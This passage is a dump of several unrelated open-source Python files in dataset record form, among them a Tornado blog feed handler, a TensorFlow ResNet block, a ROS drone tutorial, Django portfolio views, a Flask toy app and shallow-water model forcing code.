= ga_track_event_url(self.application, url)\n tracking_pixel = '' \\\n % tracking_pixel_url\n\n feed.add(\n title=post.title,\n content=post.body + tracking_pixel,\n content_type='html',\n summary=post.summary,\n author=author,\n url=url,\n id=url,\n published=post.date_created,\n # Don't update 'updated' - it seems to make Planet Python\n # re-post my updated items, which is spammy.\n #updated=post.mod,\n updated=post.date_created,\n )\n\n self.set_header('Content-Type', 'application/atom+xml; charset=UTF-8')\n self.write(unicode(feed))\n self.finish()\n\n\nclass TagHandler(MotorBlogHandler):\n \"\"\"Page of posts for a tag\"\"\"\n @gen.coroutine\n def get_posts(self, tag, page_num=0):\n page_num = int(page_num)\n tag = tag.rstrip('/')\n cursor = (self.db.posts.find({\n 'status': 'publish',\n 'type': 'post',\n 'tags': tag,\n }, {\n 'original': False\n }).sort([('pub_date', -1)]).skip(page_num * 10).limit(10))\n\n results = yield cursor.to_list(100)\n raise gen.Return(results)\n\n @tornado.web.addslash\n @check_last_modified\n def get(self, tag, page_num=0):\n page_num = int(page_num)\n tag = tag.rstrip('/')\n self.render(\n 'tag.jade',\n posts=self.posts, categories=self.categories,\n this_tag=tag, page_num=page_num)\n\n\nclass SearchHandler(MotorBlogHandler):\n @gen.coroutine\n def get(self):\n # TODO: refactor with check_last_modified(), this is gross\n # we need an async version of RequestHandler.prepare()\n category_docs = yield self.get_categories()\n self.categories = [Category(**doc) for doc in category_docs]\n\n q = self.get_argument('q', None)\n if q:\n response = yield self.db.command(\n 'text',\n 'posts',\n search=q,\n filter={'status': 'publish', 'type': 'post'},\n projection={'original': False, 'plain': False},\n limit=50)\n\n posts = [Post(**result['obj']) for result in response['results']]\n else:\n posts = []\n self.render('search.jade', q=q, posts=posts)\n","sub_path":"motor_blog/web/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":13233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"270207994","text":"## CONV BLOCK for resnet\nfrom __future__ import division,print_function\nimport numpy as np\nimport tensorflow as tf \nimport matplotlib.pyplot as plt\n\n\nclass ConvBlock(object):\n \n #layers contains parameter for each layer in the format\n #layers = [(),(),..,()]\n #where () => (input_height/width,#input channels,#output channels,#stride,padding)\n def __init__(self,layers,block_name):\n self.block_name = block_name\n self.layers = layers\n self.block_params = []\n self.n = len(layers)\n #main branch \n for i in range(self.n):\n layer = layers[i]\n filter_sz = [layer[0],layer[0],layer[1],layer[2]]\n print('layer : ',i,'filter sz : ',filter_sz)\n W = tf.Variable(initial_value=tf.random_normal(filter_sz,dtype = tf.float32))\n self.block_params.append(W)\n print(self.block_params)\n #shortcut branch \n first_input_size = self.layers[0][1]\n last_output_size = self.layers[-1][2]\n self.Ws = tf.Variable(initial_value=tf.random_normal([1,1,first_input_size,last_output_size],dtype = tf.float32))\n \n \n def predict(self,X):\n output = X\n short_output = tf.nn.conv2d(output,self.Ws,strides = [1,1,1,1],padding = \"VALID\")\n short_output = tf.layers.batch_normalization(short_output)\n for i in range(self.n):\n W = self.block_params[i]\n layer = self.layers[i]\n stride = [1,layer[3],layer[3],1]\n output = tf.nn.conv2d(output,W,strides=stride,padding = layer[4])\n output = tf.layers.batch_normalization(output)\n print(output.shape)\n if i != (self.n-1):\n output = tf.nn.relu(output)\n output = tf.add(output,short_output)\n return output\n \n \nif __name__ == '__main__':\n layers = [(1,3,12,1,'VALID'),(3,12,12,1,'SAME'),(1,12,24,1,'VALID')]\n conv_block = ConvBlock(layers,'Test block')\n \n X = np.random.random((1,224,224,3)).astype(np.float32)\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n output = conv_block.predict(X)\n print('Output shape : ',output.shape)\n","sub_path":"resnet/legacy/conv_block0.py","file_name":"conv_block0.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"15401942","text":"import numpy as np\nimport matplotlib.pyplot as mp\n\n# 设置中文字体\nmp.rcParams['font.sans-serif'] = ['SimHei']\n# mp.rcParams['axes.unicode_minus'] = False\n\n\n#otss = np.array([0.079,0.096, 0.099, 0.066,0.0735,0.154])\ngtss = np.array([0.05757,0.05308,0.05785, 0.03980, 0.06920,0.15587,0.07222833])\n#mp.figure('Bar Chart', facecolor='lightgray')\n#mp.title('Bar Chart', fontsize=16)\nmp.xlabel('Models', fontsize=18)\nmp.ylabel('Mean Relative Error', fontsize=18)\nmp.tick_params(labelsize=16)\nmp.grid(linestyle=':', axis='y')\nx = np.arange(7)\n#a = mp.bar(x - 0.2, otss, 0.3, color='dodgerblue', label='O-TSS', align='center')\nb = mp.bar(x , gtss, 0.3, color='orangered', label='TSS', align='center')\n# 设置标签\nfor i in b:\n h = i.get_height()\n mp.text(i.get_x() + i.get_width() / 2, h, '%2.5f' % (h), ha='center', va='bottom',size='10')\nmp.xticks(x, ['Gemm', 'Dsyrk', 'Dsyr2k', 'Tmm', 'Trmm', 'Matmul','AVG'])\nmp.ylim(0,0.2)\nmp.legend()\nmp.show()","sub_path":"Visualization(Serial)/relative error.py","file_name":"relative error.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"552379240","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# 例程简介: 讲解如何调用uav_control的接口实现无人机ENU坐标系下的位置控制\n# 效果说明: 无人机起飞移动到目标位置点,悬停30秒后降落\n# 备注:该例程仅支持Prometheus仿真,真机测试需要熟练掌握相关接口的定义后以及真机适配修改后使用\nfrom math import fabs\nfrom turtle import position\nimport ros\nimport rospy\nfrom prometheus_msgs.msg import UAVCommand, UAVControlState, UAVState\n\n# 创建无人机相关数据变量\nuav_control_state_sv = UAVControlState()\nuav_command_pv = UAVCommand()\nuav_state_sv = UAVState()\n\n# 无人机状态回调函数\ndef uavStateCb(msg):\n global uav_state_sv\n uav_state_sv = msg\n\n# 无人机控制状态回调函数\ndef uavControlStateCb(msg):\n global uav_control_state_sv\n uav_control_state_sv = msg\n\n# 主函数\ndef main():\n # ROS初始化,设定节点名\n rospy.init_node('body_xyz_pos_control',anonymous=True)\n # 创建命令发布标志位,命令发布则为true;初始化为false\n cmd_pub_flag = False\n # 创建无人机控制命令发布者\n UavCommandPb = rospy.Publisher(\"/uav1/prometheus/command\", UAVCommand, queue_size =10)\n # 创建无人机控制状态命令订阅者\n rospy.Subscriber(\"/uav1/prometheus/control_state\", UAVControlState, uavControlStateCb)\n # 创建无人机状态命令订阅者\n rospy.Subscriber(\"/uav1/prometheus/state\", UAVState, uavStateCb)\n # 循环频率设置为1HZ\n rate = rospy.Rate(1)\n while not rospy.is_shutdown():\n # 检测无人机是否处于[COMMAND_CONTROL]模式\n if uav_control_state_sv.control_state == UAVControlState.COMMAND_CONTROL:\n # 检测控制命令是否发布,没有发布则进行命令的发布\n if not cmd_pub_flag:\n # 时间戳\n uav_command_pv.header.stamp = rospy.Time.now()\n # 坐标系\n uav_command_pv.header.frame_id = 'ENU'\n # Init_Pos_Hover初始位置悬停,可在uav_control_indoor.yaml或uav_control_outdoor.yaml文件设置无人机悬停高度\n uav_command_pv.Agent_CMD = 1\n # 发布的命令ID,每发一次,该ID加1\n uav_command_pv.Command_ID = 1\n # 发布起飞命令\n UavCommandPb.publish(uav_command_pv)\n rate.sleep()\n # 命令发布标志位置为true\n cmd_pub_flag = True\n # 打印无人机起飞相关信息\n rospy.loginfo(\"Takeoff_height: %d\", rospy.get_param('/uav_control_main_1/control/Takeoff_height'))\n else:\n # 当无人机距离高度目标值±0.1米范围内时认为起飞完\n if fabs(uav_state_sv.position[2] - rospy.get_param('/uav_control_main_1/control/Takeoff_height')) <= 0.1:\n print(\" UAV takeoff successfully and move body position control\")\n rospy.sleep(5)\n # 时间戳\n uav_command_pv.header.stamp = rospy.Time.now()\n # 坐标系\n uav_command_pv.header.frame_id = \"BODY\"\n # Move模式\n uav_command_pv.Agent_CMD = UAVCommand.Move\n # Move_mode\n uav_command_pv.Move_mode = UAVCommand.XYZ_POS_BODY\n # BODY坐标系下的X轴正半轴对应东方,Y轴正半轴对应北方,因此下面的控制数据将会控制无人机在5米的高度移动(2,2,2)\n uav_command_pv.position_ref[0] = 2\n uav_command_pv.position_ref[1] = 2\n uav_command_pv.position_ref[2] = 2\n uav_command_pv.yaw_ref = 0\n # 发布的命令ID加1\n uav_command_pv.Command_ID += 1\n # 发布命令\n UavCommandPb.publish(uav_command_pv)\n rospy.loginfo(\"UAV move body position control and landed after 10 seconds\")\n rospy.sleep(10)\n # 时间戳\n uav_command_pv.header.stamp = rospy.Time.now()\n # 坐标系\n uav_command_pv.header.frame_id = \"ENU\"\n # Land降落,从当前位置降落至地面并自动上锁\n uav_command_pv.Agent_CMD = 3\n # 发布的命令ID加1\n uav_command_pv.Command_ID += 1\n # 发布降落命令\n UavCommandPb.publish(uav_command_pv)\n # 打印降落相关信息\n rospy.loginfo(\"[body_xyz_pos_control] tutorial_demo completed\")\n # 任务结束,关闭该节点\n rospy.signal_shutdown(\"shutdown time\")\n else:\n # 打印当前无人机高度信息\n rospy.loginfo(\"UAV height : %f [m]\", uav_state_sv.position[2])\n rospy.sleep(1)\n else:\n # 在控制命令发布后,但无人机未结束任务的情况下,此时无人机未处于[COMMAND_CONTROL]控制状态,认为无人机出现意外情况,任务中止\n if cmd_pub_flag:\n rospy.logfatal(\" Unknown error! [body_xyz_pos_control] tutorial_demo aborted\")\n # 命令未发布,等待无人机进入[COMMAND_CONTROL]状态\n else:\n rospy.logwarn(\" Wait for UAV to enter [COMMAND_CONTROL] MODE \")\n rospy.sleep(2)\n rate.sleep()\n rospy.spin()\n\nif __name__ == \"__main__\":\n try:\n main()\n except rospy.ROSInterruptException:\n pass","sub_path":"Modules/tutorial_demo/basic/body_xyz_pos_control/scripts/body_xyz_pos_control.py","file_name":"body_xyz_pos_control.py","file_ext":"py","file_size_in_byte":5703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"353009931","text":"\nimport collections\nimport re\nimport glob\n\nfiles = glob.glob('*')\nwords = []\nfor f in files:\n with open(f) as f:\n words += re.findall(r'\\w+',f.read().lower())\nfor word,num in collections.Counter(words).most_common(10):\n print(\"{0} -> {1}\".format(word,num))\n","sub_path":"python/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"239786219","text":"kwadraty = []\nfor x in range(10):\n kwadraty.append(x**2)\nprint(kwadraty)\n\n\"\"\"\nPętla to podstawowa konstrukcja wykorzystywana w językach programowania. \nPython oferuje różne sposoby powtarzania wykonywania określonych operacji, niekiedy wygodniejsze lub zwięźlejsze niż pętle. \nSą to przede wszystkim generatory wyrażeń i wyrażenia listowe, a także funkcje map() i filter().\n\"\"\"","sub_path":"Files/1.5.2_pętle.py","file_name":"1.5.2_pętle.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"31332110","text":"import heapq\n\n\n__author__ = 'Aaron Hosford'\n__all__ = [\n 'iter_combinations',\n 'PriorityQueue',\n 'PrioritySet',\n]\n\n\ndef iter_combinations(sequence_list, index=0):\n if index < len(sequence_list):\n for item in sequence_list[index]:\n for tail in iter_combinations(sequence_list, index + 1):\n yield [item] + tail\n else:\n yield []\n\n\nclass PriorityQueue:\n\n def __init__(self, values=None, key=None):\n self._values = []\n self._key = key\n self._counter = 0\n if values:\n for value in values:\n self.push(value)\n\n def __len__(self):\n return len(self._values)\n\n def __bool__(self):\n return bool(self._values)\n\n def __iter__(self):\n # Does NOT iterate in priority order!\n return iter(self._values)\n\n def push(self, value):\n # print(\"Pushing \" + repr(value))\n if self._key is None:\n heapq.heappush(self._values, (value, self._counter))\n else:\n heapq.heappush(self._values,\n (self._key(value), self._counter, value))\n self._counter += 1\n\n def pop(self):\n if self._key is None:\n value, counter = heapq.heappop(self._values)\n else:\n key, counter, value = heapq.heappop(self._values)\n if not self._values:\n self._counter = 0\n # print(\"Popping \" + repr(value))\n return value\n\n\nclass PrioritySet:\n def __init__(self, values=None, key=None):\n self._queue = PriorityQueue(key=key)\n self._values = set()\n if values is not None:\n for value in values:\n self.push(value)\n\n def __len__(self):\n return len(self._values)\n\n def __bool__(self):\n return bool(self._values)\n\n def __iter__(self):\n # Does NOT iterate in priority order!\n return iter(self._values)\n\n def push(self, value):\n if value in self._values:\n return\n self._queue.push(value)\n self._values.add(value)\n\n def pop(self):\n value = self._queue.pop()\n self._values.remove(value)\n return value\n","sub_path":"pyramids/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"353367841","text":"test_n = int(input())\n\nfor n in range(test_n):\n\n col_n = int(input())\n row1 = list(map(int, input().split(\" \")[:col_n]))\n row2 = list(map(int, input().split(\" \")[:col_n]))\n score = [row1, row2]\n\n d = [[0, score[0][0], score[1][0]]]\n for i in range(1, col_n):\n d.append([max(d[i-1]), score[0][i] + max(d[i-1][0], d[i-1][2]), score[1][i] + max(d[i-1][0], d[i-1][1])])\n\n print(max(d[-1]))","sub_path":"20190816_BJ9465.py","file_name":"20190816_BJ9465.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"382097192","text":"pos = [(0, 2), (2, 0), (2, 4), (3, 2), (5, 0), (5, 4), (6, 2)]\nfind = { int('1110111', 2): '0', \n int('0100100', 2): '1',\n int('1011101', 2): '2',\n int('1101101', 2): '3',\n int('0101110', 2): '4',\n int('1101011', 2): '5',\n int('1111011', 2): '6',\n int('0100101', 2): '7',\n int('1111111', 2): '8',\n int('1101111', 2): '9' }\n\ndef get_digit(strs, start):\n if strs[2][start + 2] == 'x':\n return '+'\n\n p = 1\n mask = 0\n for x in pos:\n if strs[x[0]][start + x[1]] == 'x':\n mask |= p\n\n p <<= 1\n\n return find[mask]\n\ndef draw_horiz(grid, row, idx):\n for i in range(5):\n grid[row][i + idx] = 'x'\n\ndef draw_vert_top(grid, col):\n for i in range(4):\n grid[i][col] = 'x'\n\ndef draw_vert_bot(grid, col):\n for i in range(3, 7):\n grid[i][col] = 'x'\n\ndef add_digit(grid, idx, c):\n if c not in '14':\n draw_horiz(grid, 0, idx)\n\n if c not in '017':\n draw_horiz(grid, 3, idx)\n\n if c not in '147':\n draw_horiz(grid, 6, idx)\n\n if c in '045689':\n draw_vert_top(grid, idx)\n\n if c not in '56':\n draw_vert_top(grid, idx + 4)\n\n if c in '0268':\n draw_vert_bot(grid, idx)\n\n if c in '013456789':\n draw_vert_bot(grid, idx + 4)\n\ndef handle(ans):\n s = str(ans)\n grid = [['.' for _ in range(len(s) * 6 - 1)] for _ in range(7)]\n\n idx = 0\n for c in s:\n add_digit(grid, idx, c)\n idx += 6\n\n for row in grid:\n print(''.join(row))\n\ndef main():\n strs = []\n for _ in range(7):\n strs.append(input())\n\n cols = len(strs[0])\n first = []\n second = []\n in_first = True\n\n for x in range(0, cols, 6):\n d = get_digit(strs, x)\n if d == '+':\n in_first = False\n else:\n if in_first:\n first.append(d)\n else:\n second.append(d)\n\n a = int(''.join(first))\n b = int(''.join(second))\n\n ans = a + b\n handle(ans)\n\nmain()\n","sub_path":"kattis/asciiaddition.py","file_name":"asciiaddition.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"489814563","text":"\n\"\"\"\nSee what's going on with PLHIV in Cote d'Ivoire\n\"\"\"\n\nfrom pylab import *\n\nwho = 'cliff'\n\nimport sys\nif who=='robyn': sys.path.append('/Users/robynstuart/Documents/Optima2/server/src/sim')\nif who=='cliff': sys.path.append('/u/cliffk/unsw/optima2/server/src/sim')\n\n# Global settings\nverbose = 2\nexportdata = 0\n\nprint('\\n\\n\\n1. Load a project...')\nif who=='robyn': origfile = '/Users/gaest/Documents/JSONs/20151124_CI_noDeaths.json'\nif who=='cliff': origfile = '/u/cliffk/unsw/applications/cotedivoire/20151124_CI_noDeaths.json'\n\nfrom dataio import loaddata\nD = loaddata(origfile)\nfrom runsimulation import runsimulation\nD = runsimulation(D, makeplot = 0, dosave = False)\n\n#print('\\n\\n\\n2. Make a copy...')\n#from copy import deepcopy\n#newD = deepcopy(D)\n#\n#print('\\n\\n\\n3. Change population growth and rerun...')\n#newD['opt']['growth'] = .024\n#\n#from makedatapars import makedatapars\n#from makemodelpars import makemodelpars\n#\n#newD = makedatapars(newD, verbose=verbose) # Update parameters\n#newD['M'] = makemodelpars(newD['P'], newD['opt'], verbose=verbose)\n#newD = runsimulation(newD, makeplot = 0, dosave = False)\n\ntvec = D['S']['tvec']\n#newtvec = newD['S']['tvec']\n\n\n\n\n\n#leg = 'Pop growth 0%','Pop growth 2.4%'\n#\n#figure()\n#hold(True)\n#plot(tvec, D['S']['death'].sum(axis=(0)))\n#plot(newtvec, newD['S']['death'].sum(axis=(0)))\n#xlabel('Year')\n#ylabel('Deaths')\n#title('Deaths', fontsize=10)\n#legend(leg, loc=4)\n#\n#figure()\n#hold(True)\n#plot(tvec, D['S']['inci'].sum(axis=(0)))\n#plot(newtvec, newD['S']['inci'].sum(axis=(0)))\n#xlabel('Year')\n#ylabel('Infections')\n#title('Infections', fontsize=10)\n#legend(leg, loc=4)\n#\n#figure()\n#hold(True)\n#plot(tvec, D['S']['people'][1:,:,:].sum(axis=(0,1)))\n#plot(newtvec, newD['S']['people'][1:,:,:].sum(axis=(0,1)))\n#xlabel('Year')\n#ylabel('PLHIV')\n#title('PLHIV', fontsize=10)\n#legend(leg, loc=4)\n#\n#figure()\n#hold(True)\n#plot(tvec[1:-1],D['S']['newpeople'][:,1:-1].sum(axis=(0)))\n#plot(newtvec[1:-1],newD['S']['newpeople'][:,1:-1].sum(axis=(0)))\n#xlabel('Year')\n#xlabel('People')\n#title('Number of extra people added per time step', fontsize=10)\n#legend(leg, loc=4)\n\n\n\ninfections = D['S']['inci'].sum(axis=0)\ndeaths = D['S']['death'].sum(axis=0)\nplhiv = D['S']['people'][1:,:,:].sum(axis=(0,1))\n\nfigure()\nhold(True)\nplot(tvec[1:], diff(plhiv))\nplot(tvec, infections-deaths)\nlegend(('PLHIV(t+1) - PLHIV(t)', 'infections-deaths'))\n\n\nimport plotpeople as pp\npp.plotpeople(D['S'])\n\n\nif exportdata:\n savetxt(\"infections.csv\", infections, delimiter=\";\")\n savetxt(\"deaths.csv\", deaths, delimiter=\";\")\n savetxt(\"plhiv.csv\", plhiv, delimiter=\";\")\n\n\n\n","sub_path":"cotedivoire/pre2016oct09/plhivcalcs.py","file_name":"plhivcalcs.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"484797904","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import *\nfrom .serializers import *\nfrom django.http import JsonResponse\nfrom rest_framework.parsers import JSONParser\n\n\ndef downloadResume(request):\n resume = Resume.objects.order_by('-uploadDate')[:1]\n serializer = ResumeSerializer(resume,many=True)\n\n return JsonResponse({'status':True,'data':serializer.data},safe=False,status=200)\n\n\ndef projectsList(request):\n if request.method == 'GET':\n projects = Projects.objects.all()\n serializer = ProjectSerializer(projects,many=True)\n\n return JsonResponse({'status':True,'data':serializer.data},safe=False,status=200)\n\n\n@csrf_exempt\ndef projectDetails(request,projectname):\n if request.method == 'POST':\n project = Projects.objects.filter(slug=projectname)\n serializer = ProjectDetailsSerializer(project,many=True)\n\n tags = ProjectTech.objects.filter(projectName=serializer.data[0]['id'])\n tagSerializer = TagSerializer(tags,many=True)\n\n return JsonResponse({'status':True,'data':serializer.data,'tech':tagSerializer.data},safe=False,status=200)\n \n return render(request,'projectsdeatils.html')\n\n\ndef latestProject(request):\n if request.method == 'GET':\n projects = Projects.objects.order_by('-uploadedDate')[:3]\n serializer = LatestProjects(projects,many=True)\n\n return JsonResponse({'status':True,'data':serializer.data},status=200,safe=False)\n\n@csrf_exempt\ndef contact(request):\n if request.method == 'POST':\n data = JSONParser().parse(request)\n \n try:\n contact = Contact.objects.create(\n firstName=data['firstName'], lastName=data['lastName'],emailId=data['email'],message=data['message'])\n return JsonResponse({'status':True,'message':'Form Submitted SuccesFully'},safe=False, status=200)\n\n except:\n return JsonResponse({'status':False,'message':'There was an Error on Submiting Form. Please try again or after Sometime'},safe=False, status=200)\n\n\ndef about(request):\n if request.method == 'GET':\n aboutme = Aboutme.objects.all()\n aboutmeSerializer = AboutmeSerializer(aboutme,many=True)\n\n education = Education.objects.all()\n educationSerializer = EducationSerializer(education,many=True)\n\n experience = Experiences.objects.all()\n experienceSerializer = ExperienceSerializer(experience,many=True)\n\n certification = Certification.objects.all()\n certificationSerializer = CertificationSerializer(certification,many=True)\n\n skills = Skills.objects.all()\n skillsSerializer = SkillsSerializer(skills,many=True)\n\n return JsonResponse({'status':True,\n 'about':aboutmeSerializer.data, 'education':educationSerializer.data , 'experience':experienceSerializer.data,\n 'certification':certificationSerializer.data, 'skills':skillsSerializer.data})\n\n\ndef servicesList(request):\n if request.method == 'GET':\n services = Services.objects.all()\n serializer = ServiceSerializer(services,many=True)\n return JsonResponse({'status':True,'data':serializer.data},safe=False,status=200)\n\n\n@csrf_exempt\ndef servicesDetails(request,servicename):\n if request.method == 'POST':\n service = Services.objects.filter(slug=servicename)\n serializer = ServiceSerializer(service,many=True)\n\n return JsonResponse({'status':True,'data':serializer.data},safe=True,status=200)\n\n return render(request,'servicesDetails.html')","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"233820051","text":"\nfrom flask import Flask, render_template, request\nimport datetime\nimport random\n\n# 플라스크서버의 이름이 app이다\napp = Flask(__name__)\n\n#url을 관리해주는 친구 >@app.rout\n@app.route(\"/\")\ndef hello() :\n return \"안녕안녕!!!\"\n\n@app.route(\"/christmas\")\ndef christmas() :\n today = datetime.datetime.now()\n \n month = today.date().month\n day = today.date().day\n\n if month ==12 and day ==25 : \n return \"

YES

\"\n\n else : \n return \"

NO

\"\n \n \n\n\n@app.route(\"/dday\")\ndef dday() :\n today = datetime.datetime.now()\n final = datetime.datetime(2020,6,9)\n result = final - today \n return f\"{result.days}일 남았습니다.\"\n\n\n\n@app.route(\"/movies\")\ndef movies() :\n movies = [\"겨울왕국2\",\"클라우스\", \"어바웃타임\", \"나홀로 집에1\"]\n return render_template(\"movie.html\",movies = movies, text = \"목록\")\n \n@app.route(\"/greeting/\")\ndef greeting(name) : \n\n return f\"안녕하세요! {name}님!\"\n\n@app.route(\"/cube/\")\ndef cube(num) :\n result = num **3\n return str(result)\n\n\n@app.route(\"/lunch/\")\ndef lunch(num) :\n menu = [\"자장면\",\"짬뽕\",\"오므라이스\",\"볶음밥\"]\n c_menu = random.sample(menu,num)\n return render_template(\"movie.html\",movies=c_menu,text = \"목록\")\n\n\n\n@app.route(\"/vonvon\")\ndef vonvon():\n return render_template(\"vonvon.html\")\n\n\n@app.route(\"/godmademe\")\ndef godmademe():\n name = request.args.get(\"name\")\n print(name)\n first_list = [\"못생김\",\"어중간함\",\"착하게생김\",\"공부잘하게생김\",\"매력\",\"덕후력\"]\n second_list = [\"애교\",\"잘난척\",\"쑥스러움\",\"다혈질\",\"자신감\",\"웃김\"]\n third_list = [\"돈복\",\"찌질\",\"식욕\",\"돈복\",\"착함\",\"멍청함\",\"활기\"]\n\n first = random.sample(first_list,1)\n second = random.sample(second_list,1)\n third = random.sample(third_list,1)\n\n\n return render_template(\"godmademe.html\",name=name,first = first, second = second, third = third)\n\n\n\n#디버그모드 실행은 무조건 python.app.py로 실행\nif __name__ == \"__main__\" :\n app.run(debug=True)\n","sub_path":"python/FLASK_examples/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"231188603","text":"# forcing\n#=======================================================\n\n# This file contains functions used to define the six forcing terms in the 2-L SW equations.\n# F1,4 are the forcings in physical space applied to the zonal momentum equations.\n# F2,5 are the forcings in physical space applied to the meridional momentum equations.\n# F3,6 are the forcings in physical space applied to the continuity equations.\n# The appropriate forcing function is called in RSW.py, depending on options defined in inputFile.py.\n\n#=======================================================\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom diagnostics import diff, extend\n\n#=======================================================\n\n# forcing_cts\ndef forcing_cts(x_nd,y_nd,K_nd,y0_nd,r0_nd,N,FORCE1,AmpF_nd,f_nd,U,L,rho1_nd,rho2_nd,dx_nd,dy_nd):\n# Takes input defined in the 2-layer input file.\n\n\tI = np.complex(0,1);\n\n\tNx = N;\t\t# This variable can be changed for testing purposes.\n\n\t# Initialise empty forcing arrays.\n\t# F4 and F5 are just empty arrays, and will be defined at the end.\n\tF1_nd = np.zeros((N,Nx));\t# u1\n\tF2_nd = np.zeros((N,Nx));\t# v1\n\tF3_nd = np.zeros((N,Nx));\t# h1\n\tF6_nd = np.zeros((N,Nx));\t# h2\n\n\t#=======================================================\n\n\tif FORCE1 == 'BALANCED':\n\t\tmass = 0.0;\n\t\tfor i in range(0,Nx):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr_nd = np.sqrt(x_nd[i]**2 + (y_nd[j]-y0_nd)**2);\n\t\t\t\tif r_nd < r0_nd:\n\t\t\t\t\tif r_nd == 0:\n\t\t\t\t\t\tF1_nd[j,i] = 0.0;\n\t\t\t\t\t\tF2_nd[j,i] = 0.0;\t\t\t\t\t\t\n\t\t\t\t\telse:\t\n\t\t\t\t\t\tF1_nd[j,i] = 0.5 * AmpF_nd * np.pi * (y_nd[j]-y0_nd) / (r0_nd * f_nd[j] * r_nd) * np.sin(np.pi * r_nd / r0_nd);\n\t\t\t\t\t\tF2_nd[j,i] = - 0.5 * AmpF_nd * np.pi * x_nd[i] / (r0_nd * f_nd[j] * r_nd) * np.sin(np.pi * r_nd / r0_nd);\n\t\t\t\t\tF3_nd[j,i] = 0.5 * AmpF_nd * (1.0 + np.cos(np.pi * r_nd / r0_nd)) / rho2_nd;\n\t\t\t\t\tmass = mass + F3_nd[j,i];\n\t\tmass = mass / (N*Nx);\n\t\tprint(mass)\n\t\tF3_nd = F3_nd - mass;\n\n\t\tF6_nd = - rho1_nd * F3_nd;\n\n\t#=======================================================\n\t\t\t\n\t# Buoyancy only.\n\tif FORCE1 == 'BUOYANCY':\n\t\tmass = 0.0;\n\t\tfor i in range(0,N):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr_nd = np.sqrt(x_nd[i]**2 + (y_nd[j]-y0_nd)**2);\n\t\t\t\tif r_nd < r0_nd:\n\t\t\t\t\tF3_nd[j,i] = 0.5 * AmpF_nd * (1.0 + np.cos(np.pi * r_nd / r0_nd)) / rho2_nd;\n\t\t\t\t\tmass = mass + F3[j,i];\n\t\tmass = mass / (N*Nx);\n\t\tF3_nd = F3_nd - mass;\n\n\t\tF6_nd = - rho1_nd * F3_nd;\n\t\t\n\t#=======================================================\n\n\t# Vorticity only.\n\tif FORCE1 == 'VORTICITY':\n\t\tfor i in range(0,Nx):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr_nd = np.sqrt(x_nd[i]**2 + (y_nd[j]-y0_nd)**2);\n\t\t\t\tif r_nd < r0_nd:\n\t\t\t\t\tif r_nd == 0:\n\t\t\t\t\t\tF1_nd[j,i] = 0.0;\n\t\t\t\t\t\tF2_nd[j,i] = 0.0;\t\t\t\t\t\t\n\t\t\t\t\telse:\t\n\t\t\t\t\t\tF1_nd[j,i] = 0.5 * AmpF_nd * np.pi * (y_nd[j]-y0_nd) / (r0_nd * f_nd[j] * r_nd) * np.sin(np.pi * r_nd / r0_nd);\n\t\t\t\t\t\tF2_nd[j,i] = - 0.5 * AmpF_nd * np.pi * x_nd[i] / (r0_nd * f_nd[j] * r_nd) * np.sin(np.pi * r_nd / r0_nd);\n\t\t\n\t#=======================================================\t\n\t\n\t# Lastly, Fourier transform the three forcings in the x-direction\n\t\t\n\tFtilde1_nd = dx_nd * np.fft.hfft(F1_nd,N,axis=1);\t# Multiply by dx_nd as FFT differs by this factor compared to FT.\n\tFtilde3_nd = dx_nd * np.fft.hfft(F3_nd,N,axis=1); \n\tFtilde2_nd = dx_nd * np.fft.fft(F2_nd,axis=1);\n\tFtilde6_nd = - rho1_nd * Ftilde3_nd;\n\n\t#=======================================================\n\n\t# Define arrays of zeros.\n\tF4_nd = np.zeros((N,Nx));\n\tF5_nd = np.zeros((N,Nx));\n\tFtilde4_nd = np.zeros((N,Nx));\n\tFtilde5_nd = np.zeros((N,Nx));\n\n\treturn F1_nd, F2_nd, F3_nd, F4_nd, F5_nd, F6_nd, Ftilde1_nd, Ftilde2_nd, Ftilde3_nd, Ftilde4_nd, Ftilde5_nd, Ftilde6_nd;\n\n#=======================================================\n#=======================================================\n\n# forcing_dcts\ndef forcing_dcts(x,y,K,y0,r0,N,FORCE1,FORCE2,AmpF,g,f,f0,U,L,rho1_nd,rho2_nd,dx,dy):\n# Takes input defined in the 2-layer input file.\n\n\tI = np.complex(0,1);\n\n\tNx = N;\t\t# This variable can be changed for testing purposes.\n\n\t# Initialise empty forcing arrays.\n\t# F4 and F5 are just empty arrays, and will be defined at the end.\n\tF1_nd = np.zeros((N,Nx));\t# u1\n\tF2_nd = np.zeros((N,Nx));\t# 